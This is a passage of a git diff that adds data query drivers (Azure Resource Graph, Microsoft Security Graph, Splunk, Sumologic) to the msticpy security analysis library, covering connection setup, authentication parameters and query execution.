+    # map names to allow for different spellings
+    return _map_config_dict_name(app_config)
diff --git a/msticpy/data/drivers/resource_graph_driver.py b/msticpy/data/drivers/resource_graph_driver.py
new file mode 100644
index 000000000..97d4ed7e5
--- /dev/null
+++ b/msticpy/data/drivers/resource_graph_driver.py
@@ -0,0 +1,193 @@
+# -------------------------------------------------------------------------
+# Copyright (c) SecureWorks. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure Resource Graph Driver class."""
+from typing import Any, Tuple, Union
+import warnings
+
+import pandas as pd
+from pandas.core.frame import DataFrame
+
+from .driver_base import DriverBase, QuerySource
+from ..._version import VERSION
+from ...common.utility import export
+from ...common.exceptions import (
+    MsticpyNotConnectedError,
+    MsticpyImportExtraError,
+)
+from ...common.azure_auth import az_connect, AzureCloudConfig, only_interactive_cred
+
+# pylint: disable=wrong-import-order
+from azure.mgmt.subscription import SubscriptionClient
+
+try:
+    from azure.mgmt.resourcegraph import ResourceGraphClient
+    from azure.mgmt.resourcegraph.models import (
+        ResultTruncated,
+        QueryRequest,
+        QueryRequestOptions,
+        QueryResponse,
+        ResultFormat,
+    )
+except ImportError as imp_err:
+    raise MsticpyImportExtraError(
+        "Cannot use this feature without azure-mgmt-resourcegraph installed",
+        title="Error importing azure-mgmt-resourcegraph",
+        extra="azure",
+    ) from imp_err
+# pylint: enable=wrong-import-order
+
+__version__ = VERSION
+__author__ = "Ryan Cobb"
+
+
+@export
+class ResourceGraphDriver(DriverBase):
+    """Driver to connect and query from Azure Resource Graph."""
+
+    def __init__(self, **kwargs):
+        """Instantiate Azure Resource Graph Driver."""
+        super().__init__()
+        self.client = None
+        self.sub_client = None
+        self.subscription_ids = None
+        self._connected = False
+        self._debug = kwargs.get("debug", False)
+        self.az_cloud_config = AzureCloudConfig(cloud=kwargs.get("cloud"))
+
+    def connect(self, connection_str: str = None, **kwargs):
+        """
+        Connect to Azure Resource Graph via Azure SDK.
+
+        Parameters
+        ----------
+        connection_str : Optional[str], optional
+            Not used.
+
+        Other Parameters
+        ----------------
+        kwargs :
+            Connection parameters can be supplied as keyword parameters.
+
+        Notes
+        -----
+        Default configuration is read from the DataProviders/AzureCLI
+        section of msticpyconfig.yaml, if available.
+
+        """
+        auth_methods = kwargs.get("auth_methods")
+        auth_methods = auth_methods or self.az_cloud_config.auth_methods
+        silent = kwargs.get("silent", True)
+
+        credentials = az_connect(auth_methods=auth_methods, silent=silent)
+        if only_interactive_cred(credentials.modern):
+            print("Check your default browser for interactive sign-in prompt.")
+        self.client = ResourceGraphClient(
+            credential=credentials.modern,
+            base_url=self.az_cloud_config.endpoints.resource_manager,
+            credential_scopes=[self.az_cloud_config.token_uri],
+        )
+        self.sub_client = SubscriptionClient(
+            credential=credentials.modern,
+            base_url=self.az_cloud_config.endpoints.resource_manager,
+            credential_scopes=[self.az_cloud_config.token_uri],
+        )
+        self.subscription_ids = [
+            sub.subscription_id
+            for sub in self.sub_client.subscriptions.list()  # type: ignore
+        ]
+
+        self._connected = True
+        self._loaded = True
+
+        print("Connected")
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute Resource Graph query and retrieve results.
+
+        Parameters
+        ----------
+        query : str
+            KQL query to execute
+        query_source : QuerySource
+            The query definition object
+
+        Other Parameters
+        ----------------
+        kwargs :
+            count
+
+        Returns
+        -------
+        Union[pd.DataFrame, Any]
+            Query results in a dataframe.
+            or query response if an error.
+
+        """
+        del query_source
+        result_df, result = self.query_with_results(query, **kwargs)
+        if isinstance(result_df, DataFrame) and not result_df.empty:
+            return result_df
+
+        return result
+
+    def query_with_results(self, query: str, **kwargs) -> Tuple[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            Query to execute against Resource Graph
+
+        Returns
+        -------
+        Union[pd.DataFrame,Any]
+            A DataFrame (if successful) or
+            the underlying provider result if an error occurs.
+
+        """
+        if not self.connected:
+            self.connect()
+        if not self.connected:
+            raise MsticpyNotConnectedError(
+                "Source is not connected. ", "Please call connect() and retry."
+            )
+
+        result_truncated = False
+
+        top = kwargs.get("top", 1000)
+
+        request_options = QueryRequestOptions(
+            top=top,
+            result_format=ResultFormat.object_array,
+        )
+
+        request = QueryRequest(
+            query=query,
+            subscriptions=self.subscription_ids,
+            options=request_options,
+        )
+
+        response = self.client.resources(request)  # type: QueryResponse
+
+        # Pagination logic adapted from azure-cli-extensions
+        # https://github.com/Azure/azure-cli-extensions/blob/8dade2f6fe28803d0fbdb1700c3ab4e4d71e5318/src/resource-graph/azext_resourcegraph/custom.py#L75
+
+        if response.result_truncated == ResultTruncated.true:
+            result_truncated = True
+
+        if result_truncated and top is not None and len(response.data) < top:
+            warnings.warn(
+                "Unable to paginate the results of the query. "
+                "Some resources may be missing from the results. "
+                "To rewrite the query and enable paging, "
+                "see the docs for an example: https://aka.ms/arg-results-truncated",
+            )
+
+        return pd.json_normalize(response.data), response
diff --git a/msticpy/data/drivers/security_graph_driver.py b/msticpy/data/drivers/security_graph_driver.py
new file mode 100644
index 000000000..4b8f476bb
--- /dev/null
+++ b/msticpy/data/drivers/security_graph_driver.py
@@ -0,0 +1,75 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Security Graph OData Driver class."""
+from typing import Union, Any
+import pandas as pd
+
+from .odata_driver import OData, QuerySource
+from ...common.azure_auth_core import AzureCloudConfig
+from ...common.utility import export
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@export
+class SecurityGraphDriver(OData):
+    """Driver to query security graph."""
+
+    CONFIG_NAME = "MicrosoftGraph"
+    _ALT_CONFIG_NAMES = ["SecurityGraphApp"]
+
+    def __init__(self, connection_str: str = None, **kwargs):
+        """
+        Instantiate MSGraph driver and optionally connect.
+
+        Parameters
+        ----------
+        connection_str : str, optional
+            Connection string
+
+        """
+        super().__init__(**kwargs)
+        azure_cloud = AzureCloudConfig()
+        self.req_body = {
+            "client_id": None,
+            "client_secret": None,
+            "grant_type": "client_credentials",
+            "scope": f"{azure_cloud.endpoints.microsoft_graph_resource_id}/.default",
+        }
+        self.oauth_url = (
+            f"{azure_cloud.endpoints.active_directory}/" "{tenantId}/oauth2/v2.0/token"
+        )
+        self.api_root = azure_cloud.endpoints.microsoft_graph_resource_id
+        self.api_ver = kwargs.get("api_ver", "v1.0")
+
+        if connection_str:
+            self.current_connection = connection_str
+            self.connect(connection_str)
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The query to execute
+        query_source : QuerySource
+            The query definition object
+
+        Returns
+        -------
+        Union[pd.DataFrame, results.ResultSet]
+            A DataFrame (if successfull) or
+            the underlying provider result if an error.
+
+        """
+        del query_source, kwargs
+        return self.query_with_results(query, body=False)[0]
diff --git a/msticpy/data/drivers/splunk_driver.py b/msticpy/data/drivers/splunk_driver.py
new file mode 100644
index 000000000..39a285476
--- /dev/null
+++ b/msticpy/data/drivers/splunk_driver.py
@@ -0,0 +1,418 @@
+#  -------------------------------------------------------------------------
+#  Copyright (c) Microsoft Corporation. All rights reserved.
+#  Licensed under the MIT License. See License.txt in the project root for
+#  license information.
+#  --------------------------------------------------------------------------
+"""Splunk Driver class."""
+from datetime import datetime
+from typing import Any, Tuple, Union, Dict, Iterable, Optional
+from time import sleep
+from tqdm import tqdm
+
+import pandas as pd
+from .driver_base import DriverBase, QuerySource
+from ..._version import VERSION
+from ...common.utility import export, check_kwargs
+from ...common.exceptions import (
+    MsticpyConnectionError,
+    MsticpyNotConnectedError,
+    MsticpyUserConfigError,
+    MsticpyImportExtraError,
+)
+from ...common.provider_settings import get_provider_settings, ProviderSettings
+
+try:
+    import splunklib.client as sp_client
+    import splunklib.results as sp_results
+    from splunklib.client import AuthenticationError, HTTPError
+except ImportError as imp_err:
+    raise MsticpyImportExtraError(
+        "Cannot use this feature without splunk-sdk installed",
+        title="Error importing splunk-sdk",
+        extra="splunk",
+    ) from imp_err
+
+__version__ = VERSION
+__author__ = "Ashwin Patil"
+
+
+SPLUNK_CONNECT_ARGS = {
+    "host": "(string) The host name (the default is 'localhost').",
+    "port": "(integer) The port number (the default is 8089).",
+    "http_scheme": "('https' or 'http') The scheme for accessing the service "
+    + "(the default is 'https').",
+    "verify": "(Boolean) Enable (True) or disable (False) SSL verification for "
+    + "https connections. (optional, the default is True)",
+    "owner": "(string) The owner context of the namespace (optional).",
+    "app": "(string) The app context of the namespace (optional).",
+    "sharing": "('global', 'system', 'app', or 'user') "
+    + "The sharing mode for the namespace (the default is 'user').",
+    "token": "(string) The current session token (optional). Session tokens can be"
+    + " shared across multiple service instances.",
+    "cookie": "(string) A session cookie. When provided, you don’t need to call"
+    + " login(). This parameter is only supported for Splunk 6.2+.",
+    "autologin": "(boolean) When True, automatically tries to log in again if"
+    + " the session terminates.",
+    "username": "(string) The Splunk account username, which is used to "
+    + "authenticate the Splunk instance.",
+    "password": "(string) The password for the Splunk account.",
+}
+
+
+@export
+class SplunkDriver(DriverBase):
+    """Driver to connect and query from Splunk."""
+
+    _SPLUNK_REQD_ARGS = ["host", "username", "password"]
+    _CONNECT_DEFAULTS: Dict[str, Any] = {"port": 8089}
+    _TIME_FORMAT = '"%Y-%m-%d %H:%M:%S.%6N"'
+
+    def __init__(self, **kwargs):
+        """Instantiate Splunk Driver."""
+        super().__init__(**kwargs)
+        self.service = None
+        self._loaded = True
+        self._connected = False
+        self._debug = kwargs.get("debug", False)
+        self.public_attribs = {
+            "client": self.service,
+            "saved_searches": self._saved_searches,
+            "fired_alerts": self._fired_alerts,
+        }
+        self.formatters = {"datetime": self._format_datetime, "list": self._format_list}
+
+    def connect(self, connection_str: str = None, **kwargs):
+        """
+        Connect to Splunk via splunk-sdk.
+
+        Parameters
+        ----------
+        connection_str : Optional[str], optional
+            Connection string with Splunk connection parameters
+
+        Other Parameters
+        ----------------
+        kwargs :
+            Connection parameters can be supplied as keyword parameters.
+
+        Notes
+        -----
+        Default configuration is read from the DataProviders/Splunk
+        section of msticpyconfig.yaml, if available.
+
+        """
+        cs_dict = self._get_connect_args(connection_str, **kwargs)
+
+        arg_dict = {
+            key: val for key, val in cs_dict.items() if key in SPLUNK_CONNECT_ARGS
+        }
+        try:
+            self.service = sp_client.connect(**arg_dict)
+        except AuthenticationError as err:
+            raise MsticpyConnectionError(
+                f"Authentication error connecting to Splunk: {err}",
+                title="Splunk connection",
+                help_uri="https://msticpy.readthedocs.io/en/latest/DataProviders.html",
+            ) from err
+        except HTTPError as err:
+            raise MsticpyConnectionError(
+                f"Communication error connecting to Splunk: {err}",
+                title="Splunk connection",
+                help_uri="https://msticpy.readthedocs.io/en/latest/DataProviders.html",
+            ) from err
+        except Exception as err:
+            raise MsticpyConnectionError(
+                f"Error connecting to Splunk: {err}",
+                title="Splunk connection",
+                help_uri="https://msticpy.readthedocs.io/en/latest/DataProviders.html",
+            ) from err
+        self._connected = True
+        print("connected")
+
+    def _get_connect_args(
+        self, connection_str: Optional[str], **kwargs
+    ) -> Dict[str, Any]:
+        """Check and consolidate connection parameters."""
+        cs_dict: Dict[str, Any] = self._CONNECT_DEFAULTS
+        # Fetch any config settings
+        cs_dict.update(self._get_config_settings())
+        # If a connection string - parse this and add to config
+        if connection_str:
+            cs_items = connection_str.split(";")
+            cs_dict.update(
+                {
+                    cs_item.split("=")[0].strip(): cs_item.split("=")[1]
+                    for cs_item in cs_items
+                }
+            )
+        elif kwargs:
+            # if connection args supplied as kwargs
+            cs_dict.update(kwargs)
+            check_kwargs(cs_dict, list(SPLUNK_CONNECT_ARGS.keys()))
+
+        cs_dict["port"] = int(cs_dict["port"])
+        verify_opt = cs_dict.get("verify")
+        if isinstance(verify_opt, str):
+            cs_dict["verify"] = "true" in verify_opt.casefold()
+        elif isinstance(verify_opt, bool):
+            cs_dict["verify"] = verify_opt
+
+        missing_args = set(self._SPLUNK_REQD_ARGS) - cs_dict.keys()
+        if missing_args:
+            raise MsticpyUserConfigError(
+                "One or more connection parameters missing for Splunk connector",
+                ", ".join(missing_args),
+                f"Required parameters are {', '.join(self._SPLUNK_REQD_ARGS)}",
+                "All parameters:",
+                *[f"{arg}: {desc}" for arg, desc in SPLUNK_CONNECT_ARGS.items()],
+                title="no Splunk connection parameters",
+            )
+        return cs_dict
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute splunk query and retrieve results via OneShot or async search mode.
+
+        Parameters
+        ----------
+        query : str
+            Splunk query to execute via OneShot or async search mode
+        query_source : QuerySource
+            The query definition object
+
+        Other Parameters
+        ----------------
+        kwargs :
+            Are passed to Splunk oneshot method
+            count=0 by default
+            oneshot=False by default for async query,
+                set to True for oneshot (blocking) mode
+
+        Returns
+        -------
+        Union[pd.DataFrame, Any]
+            Query results in a dataframe.
+            or query response if an error.
+
+        """
+        del query_source
+        if not self._connected:
+            raise self._create_not_connected_err()
+
+        # default to unlimited query unless count is specified
+        count = kwargs.pop("count", 0)
+
+        # Normal, oneshot or blocking searches. Defaults to non-blocking
+        # Oneshot is blocking a blocking HTTP call which may cause time-outs
+        # https://dev.splunk.com/enterprise/docs/python/sdk-python/howtousesplunkpython/howtorunsearchespython
+        is_oneshot = kwargs.get("oneshot", False)
+
+        if is_oneshot:
+            query_results = self.service.jobs.oneshot(query, count=count, **kwargs)
+            reader = sp_results.ResultsReader(query_results)
+
+        else:
+            # Set mode and initialize async job
+            kwargs_normalsearch = {"exec_mode": "normal"}
+            query_job = self.service.jobs.create(query, **kwargs_normalsearch)
+
+            # Initiate progress bar and start while loop, waiting for async query to complete
+            progress_bar = tqdm(total=100, desc="Waiting Splunk job to complete")
+            while not query_job.is_done():
+                current_state = query_job.state()
+                progress = float(current_state["content"]["doneProgress"]) * 100
+                progress_bar.update(progress)
+                sleep(1)
+
+            # Update progress bar indicating completion and fetch results
+            progress_bar.update(100)
+            progress_bar.close()
+            reader = sp_results.ResultsReader(query_job.results())
+
+        resp_rows = [row for row in reader if isinstance(row, dict)]
+        if not resp_rows:
+            print("Warning - query did not return any results.")
+            return [row for row in reader if isinstance(row, sp_results.Message)]
+        return pd.DataFrame(resp_rows)
+
+    def query_with_results(self, query: str, **kwargs) -> Tuple[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            Query to execute against splunk instance.
+
+        Returns
+        -------
+        Union[pd.DataFrame,Any]
+            A DataFrame (if successful) or
+            the underlying provider result if an error occurs.
+
+        """
+
+    @property
+    def service_queries(self) -> Tuple[Dict[str, str], str]:
+        """
+        Return dynamic queries available on connection to service.
+
+        Returns
+        -------
+        Tuple[Dict[str, str], str]
+            Dictionary of query_name, query_text.
+            Name of container to add queries to.
+
+        """
+        if not self.connected:
+            raise self._create_not_connected_err()
+        if hasattr(self.service, "saved_searches") and self.service.saved_searches:
+            queries = {
+                search.name.strip().replace(" ", "_"): f"search {search['search']}"
+                for search in self.service.saved_searches
+            }
+            return queries, "SavedSearches"
+        return {}, "SavedSearches"
+
+    @property
+    def driver_queries(self) -> Iterable[Dict[str, Any]]:
+        """
+        Return dynamic queries available on connection to service.
+
+        Returns
+        -------
+        Iterable[Dict[str, Any]]
+            List of queries with properties: "name", "query", "container"
+            and (optionally) "description"
+
+        Raises
+        ------
+        MsticpyNotConnectedError
+            If called before driver is connected.
+
+        """
+        if not self.connected:
+            raise self._create_not_connected_err()
+        if hasattr(self.service, "saved_searches") and self.service.saved_searches:
+            return [
+                {
+                    "name": search.name.strip().replace(" ", "_"),
+                    "query": f"search {search['search']}",
+                    "query_paths": "SavedSearches",
+                    "description": "",
+                }
+                for search in self.service.saved_searches
+            ]
+        return []
+
+    @property
+    def _saved_searches(self) -> Union[pd.DataFrame, Any]:
+        """
+        Return list of saved searches in dataframe.
+
+        Returns
+        -------
+        pd.DataFrame
+            Dataframe with list of saved searches with name and query columns.
+
+        """
+        if self.connected:
+            return self._get_saved_searches()
+        return None
+
+    def _get_saved_searches(self) -> Union[pd.DataFrame, Any]:
+        """
+        Return list of saved searches in dataframe.
+
+        Returns
+        -------
+        pd.DataFrame
+            Dataframe with list of saved searches with name and query columns.
+
+        """
+        if not self.connected:
+            raise self._create_not_connected_err()
+        savedsearches = self.service.saved_searches
+
+        out_df = pd.DataFrame(columns=["name", "query"])
+
+        namelist = []
+        querylist = []
+        for savedsearch in savedsearches:
+            namelist.append(savedsearch.name.replace(" ", "_"))
+            querylist.append(savedsearch["search"])
+        out_df["name"] = namelist
+        out_df["query"] = querylist
+
+        return out_df
+
+    @property
+    def _fired_alerts(self) -> Union[pd.DataFrame, Any]:
+        """
+        Return list of fired alerts in dataframe.
+
+        Returns
+        -------
+        pd.DataFrame
+            Dataframe with list of fired alerts with alert name and count columns.
+
+        """
+        if self.connected:
+            return self._get_fired_alerts()
+        return None
+
+    def _get_fired_alerts(self) -> Union[pd.DataFrame, Any]:
+        """
+        Return list of fired alerts in dataframe.
+
+        Returns
+        -------
+        pd.DataFrame
+            Dataframe with list of fired alerts with alert name and count columns.
+
+        """
+        if not self.connected:
+            raise self._create_not_connected_err()
+        firedalerts = self.service.fired_alerts
+
+        out_df = pd.DataFrame(columns=["name", "count"])
+
+        alert_names = []
+        alert_counts = []
+        for alert in firedalerts:
+            alert_names.append(alert.name)
+            alert_counts.append(alert.count)
+        out_df["name"] = alert_names
+        out_df["count"] = alert_counts
+
+        return out_df
+
+    # Parameter Formatting methods
+    @staticmethod
+    def _format_datetime(date_time: datetime) -> str:
+        """Return datetime-formatted string."""
+        return f'"{date_time.isoformat(sep=" ")}"'
+
+    @staticmethod
+    def _format_list(param_list: Iterable[Any]) -> str:
+        """Return formatted list parameter."""
+        fmt_list = [f'"{item}"' for item in param_list]
+        return ",".join(fmt_list)
+
+    # Read values from configuration
+    @staticmethod
+    def _get_config_settings() -> Dict[Any, Any]:
+        """Get config from msticpyconfig."""
+        data_provs = get_provider_settings(config_section="DataProviders")
+        splunk_settings: Optional[ProviderSettings] = data_provs.get("Splunk")
+        return getattr(splunk_settings, "args", {})
+
+    @staticmethod
+    def _create_not_connected_err():
+        return MsticpyNotConnectedError(
+            "Please run the connect() method before running this method.",
+            title="not connected to Splunk.",
+            help_uri="https://msticpy.readthedocs.io/en/latest/DataProviders.html",
+        )
diff --git a/msticpy/data/drivers/sumologic_driver.py b/msticpy/data/drivers/sumologic_driver.py
new file mode 100644
index 000000000..4a5d2cbcf
--- /dev/null
+++ b/msticpy/data/drivers/sumologic_driver.py
@@ -0,0 +1,496 @@
+#  -------------------------------------------------------------------------
+#  Copyright (c) juju4. All rights reserved.
+#  Licensed under the MIT License. See License.txt in the project root for
+#  license information.
+#  --------------------------------------------------------------------------
+"""Sumologic Driver class."""
+import re
+import time
+from datetime import datetime, timedelta
+from timeit import default_timer as timer
+from typing import Any, Dict, Optional, Tuple, Union
+
+import pandas as pd
+import httpx
+from sumologic.sumologic import SumoLogic
+
+from ..._version import VERSION
+from ...common.exceptions import (
+    MsticpyConnectionError,
+    MsticpyNotConnectedError,
+    MsticpyUserConfigError,
+    MsticpyUserError,
+)
+from ...common.provider_settings import ProviderSettings, get_provider_settings
+from ...common.utility import check_kwargs, export
+from .driver_base import DriverBase, QuerySource
+
+__version__ = VERSION
+__author__ = "juju4"
+
+
+SUMOLOGIC_CONNECT_ARGS = {
+    "connection_str": "(string) The url endpoint (the default is"
+    + " 'https://api.us2.sumologic.com/api').",
+    "accessid": "(string) The Sumologic accessid, which is used to "
+    + "authenticate on Sumologic instance.",
+    "accesskey": "(string) The matching Sumologic accesskey.",
+}
+
+_HELP_URI = "https://msticpy.readthedocs.io/en/latest/DataProviders.html"
+_SL_NB_URI = (
+    "https://github.com/microsoft/msticpy/blob/pr/116-sumologic"
+    "-driver-2021-04-21/docs/notebooks/Sumologic-DataConnector.ipynb"
+)
+
+
+@export
+class SumologicDriver(DriverBase):
+    """Driver to connect and query from Sumologic."""
+
+    _SUMOLOGIC_REQD_ARGS = ["connection_str", "accessid", "accesskey"]
+    _CONNECT_DEFAULTS: Dict[str, Any] = {
+        "connection_str": "https://api.us2.sumologic.com/api"
+    }
+    _TIME_FORMAT = '"%Y-%m-%d %H:%M:%S.%6N"'
+    _DEF_CHECKINTERVAL = 3
+    _DEF_TIMEOUT = 300
+
+    def __init__(self, **kwargs):
+        """Instantiate Sumologic Driver."""
+        super().__init__(**kwargs)
+        self.service = None
+        self._loaded = True
+        self._connected = False
+        self._debug = kwargs.get("debug", False)
+        self.public_attribs = {
+            "client": self.service,
+        }
+        self.formatters = {"datetime": self._format_datetime}
+        self.checkinterval = self._DEF_CHECKINTERVAL
+        self.timeout = self._DEF_TIMEOUT
+
+    def connect(self, connection_str: str = None, **kwargs):
+        """
+        Connect to Sumologic via sumologic-sdk.
+
+        Parameters
+        ----------
+        connection_str :
+            Sumologic API url endpoint. default: https://api.us2.sumologic.com/api
+
+        Other Parameters
+        ----------------
+        kwargs :
+            Connection parameters can be supplied as keyword parameters.
+
+        Notes
+        -----
+        Default configuration is read from the DataProviders/Sumologic
+        section of msticpyconfig.yaml, if available.
+
+        """
+        cs_dict = self._get_connect_args(connection_str, **kwargs)
+
+        arg_dict = {
+            key: val for key, val in cs_dict.items() if key in SUMOLOGIC_CONNECT_ARGS
+        }
+        try:
+            # https://github.com/SumoLogic/sumologic-python-sdk/blob/master/scripts/search-job.py
+            self.service = SumoLogic(
+                accessId=arg_dict["accessid"],
+                accessKey=arg_dict["accesskey"],
+                endpoint=arg_dict["connection_str"],
+            )
+        except httpx.ConnectError as err:
+            raise MsticpyConnectionError(
+                f"Authentication error connecting to Sumologic: {err}",
+                title="Sumologic connection",
+                help_uri=_HELP_URI,
+                nb_uri=_SL_NB_URI,
+            ) from err
+        except httpx.HTTPError as err:
+            raise MsticpyConnectionError(
+                f"Communication error connecting to Sumologic: {err}",
+                title="Sumologic connection",
+                help_uri=_HELP_URI,
+                nb_uri=_SL_NB_URI,
+            ) from err
+        except Exception as err:
+            raise MsticpyConnectionError(
+                f"Error connecting to Sumologic: {err}",
+                title="Sumologic connection",
+                help_uri=_HELP_URI,
+                nb_uri=_SL_NB_URI,
+            ) from err
+        self._connected = True
+        print(f"connected with accessid {arg_dict['accessid']}")
+
+    def _get_connect_args(
+        self, connection_str: Optional[str], **kwargs
+    ) -> Dict[str, Any]:
+        """Check and consolidate connection parameters."""
+        cs_dict: Dict[str, Any] = self._CONNECT_DEFAULTS
+        # Fetch any config settings
+        settings, cs_is_instance_name = self._get_config_settings(connection_str)
+        cs_dict.update(settings)
+        # If a connection string - parse this and add to config
+        if connection_str and not cs_is_instance_name:
+            cs_dict["connection_str"] = connection_str
+        if kwargs:
+            # if connection args supplied as kwargs
+            cs_dict.update(kwargs)
+            check_kwargs(cs_dict, list(SUMOLOGIC_CONNECT_ARGS.keys()))
+
+        missing_args = set(self._SUMOLOGIC_REQD_ARGS) - cs_dict.keys()
+        if missing_args:
+            raise MsticpyUserConfigError(
+                "One or more connection parameters missing for Sumologic connector",
+                ", ".join(missing_args),
+                f"Required parameters are {', '.join(self._SUMOLOGIC_REQD_ARGS)}",
+                "All parameters:",
+                *[f"{arg}: {desc}" for arg, desc in SUMOLOGIC_CONNECT_ARGS.items()],
+                title="no Sumologic connection parameters",
+                help_uri=_HELP_URI,
+                notebook_uri=_SL_NB_URI,
+            )
+        return cs_dict
+
+    # pylint: disable=broad-except
+    def _query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute Sumologic query and retrieve results.
+
+        Parameters
+        ----------
+        query : str
+            Sumologic query to execute
+        query_source : QuerySource
+            Not used.
+
+        Other Parameters
+        ----------------
+        days : int
+            Search the past X days.
+        start : datetime
+            A datetime() object representing the start of the search
+            window. If used without end_time, the end of the search
+            window is the current time.
+        start_time : datetime
+            alias for `start`
+        end : datetime
+            A datetime() object representing the end of the search window.
+            If used without start_time, the search start will be the earliest
+            time in the index.
+        end_time:
+            alias for `end`
+        timezone : str
+            timezone used for time range search
+        byreceipttime : datetime
+            if time reference should used _receiptTime (time when Sumologic
+            got message) instead of _messageTime (time present in log message).
+        limit : int
+            An integer describing the max number of search results to return.
+        forcemessagesresults : bool
+            Force results to be raw messages even if aggregated query.
+        verbosity : int
+            Provide more verbose state. from 0 least verbose to 4 most one.
+        checkinterval : int
+            interval in seconds to check if results are gathered
+        timeout : int
+            timeout in seconds when gathering results
+
+        Returns
+        -------
+        Union[pd.DataFrame, Any]
+            Query results in a dataframe.
+            or query response if an error.
+
+        """
+        del query_source
+        if not self._connected:
+            raise self._create_not_connected_err()
+
+        verbosity = kwargs.pop("verbosity", 0)
+        timezone = kwargs.pop("timezone", "UTC")
+        by_receipt_time = kwargs.pop("byreceipttime", False)
+        self.checkinterval = kwargs.pop("checkinterval", self._DEF_CHECKINTERVAL)
+        self.timeout = kwargs.pop("timeout", self._DEF_TIMEOUT)
+
+        start_time, end_time = self._get_time_params(**kwargs)
+
+        # default to unlimited query unless count is specified
+        if "limit" in kwargs:
+            query = f"{query} | limit {kwargs['limit']}"
+        limit = kwargs.pop("limit", 10000)
+
+        if verbosity >= 1:
+            print(f"INFO: from {start_time} to {end_time}, TZ {timezone}")
+
+        if verbosity >= 2:
+            print(f"DEBUG: query {query}")
+            print(f"DEBUG: byreceipttime {by_receipt_time}")
+            timer_start = timer()
+        # submit the search job
+        try:
+            searchjob = self.service.search_job(
+                query, start_time, end_time, timezone, by_receipt_time
+            )
+        except Exception as err:
+            self._raise_qry_except(err, "submit search_job", "to submit search job")
+
+        qry_count = re.search(r"\|\s*count", query, re.IGNORECASE)
+        if verbosity >= 2:
+            print(f"DEBUG: search job {searchjob}")
+            print(f"DEBUG: search performance: {timer() - timer_start}")
+            print(f"DEBUG: messages or records? {qry_count}")
+
+        # poll for job completion
+        status = self._poll_job_status(searchjob, verbosity)
+        print(status["state"])
+
+        # return the results
+        return self._get_job_results(
+            searchjob=searchjob,
+            status=status,
+            qry_count=qry_count,
+            force_mssg_rstls=kwargs.pop("forcemessagesresults", False),
+            limit=limit,
+        )
+
+    def _poll_job_status(self, searchjob, verbosity):
+        status = self.service.search_job_status(searchjob)
+        if verbosity >= 2:
+            print(f"DEBUG: status {status}")
+        time_counter = 0
+        while status["state"] != "DONE GATHERING RESULTS":
+            if status["state"] == "CANCELLED":
+                break
+            status = self.service.search_job_status(searchjob)
+            if verbosity >= 4:
+                print(
+                    f"DEBUG: pending results, state {status['state']}.",
+                    f"slept {time_counter}s. sleeping extra {self.checkinterval}s",
+                    "until {self.timeout}s",
+                )
+            if time_counter < self.timeout:
+                time.sleep(self.checkinterval)
+                time_counter += self.checkinterval
+            else:
+                print(
+                    f"WARN: wait more than timeout {self.timeout}. stopping. "
+                    + "Use timeout argument to wait longer."
+                )
+                break
+        return status
+
+    # pylint: disable=inconsistent-return-statements
+    # I don't think there are any - everything returns a list
+    def _get_job_results(self, searchjob, status, qry_count, force_mssg_rstls, limit):
+        if status["state"] != "DONE GATHERING RESULTS":
+            return []
+        if not qry_count or force_mssg_rstls:
+            # Non-aggregated results, Messages only
+            count = status["messageCount"]
+            limit2 = (
+                count if count < limit and count != 0 else limit
+            )  # compensate bad limit check
+            try:
+                result = self.service.search_job_messages(searchjob, limit=limit2)
+                return result["messages"]
+            except Exception as err:
+                self._raise_qry_except(
+                    err, "search_job_messages", "to get job messages"
+                )
+        else:
+            # Aggregated results
+            count = status["recordCount"]
+            limit2 = (
+                count if count < limit and count != 0 else limit
+            )  # compensate bad limit check
+            try:
+                result = self.service.search_job_records(searchjob, limit=limit2)
+                return result["records"]
+            except Exception as err:
+                self._raise_qry_except(
+                    err, "search_job_records", "to get search records"
+                )
+
+    # pylint: enable=inconsistent-return-statements
+
+    @staticmethod
+    def _raise_qry_except(err: Exception, mssg: str, action: Optional[str] = None):
+        if isinstance(err, httpx.HTTPError):
+            raise MsticpyConnectionError(
+                f"Communication error connecting to Sumologic: {err}",
+                title=f"Sumologic {mssg}",
+                help_uri=_HELP_URI,
+                notebook_uri=_SL_NB_URI,
+            ) from err
+        action = action or mssg
+        raise MsticpyConnectionError(
+            f"Failed {action}: {err}",
+            title=f"Sumologic - {mssg}",
+            help_uri=_HELP_URI,
+            notebook_uri=_SL_NB_URI,
+        ) from err
+
+    def _get_time_params(self, **kwargs):
+        if "days" in kwargs:
+            end = datetime.now()
+            start = end - timedelta(days=int(kwargs["days"]))
+            return self._format_datetime(start), self._format_datetime(end)
+
+        start = kwargs.pop("start", kwargs.pop("start_time", None))
+        end = kwargs.pop("end", kwargs.pop("end_time", None))
+        if start and not end:
+            end = datetime.now()
+        elif not start:
+            raise MsticpyUserError(
+                "Error! requires either 'days' or 'start' parameters",
+                title="Missing parameter.",
+                help_uri=_HELP_URI,
+                notebook_uri=_SL_NB_URI,
+            )
+        return self._format_datetime(start), self._format_datetime(end)
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute Sumologic query and retrieve results.
+
+        Parameters
+        ----------
+        query : str
+            Sumologic query to execute
+        query_source : QuerySource
+            Not used.
+
+        Other Parameters
+        ----------------
+        days: int
+            Search the past X days.
+        start : datetime
+            A datetime() object representing the start of the search
+            window. If used without end_time, the end of the search
+            window is the current time.
+        start_time : datetime
+            alias for `start`
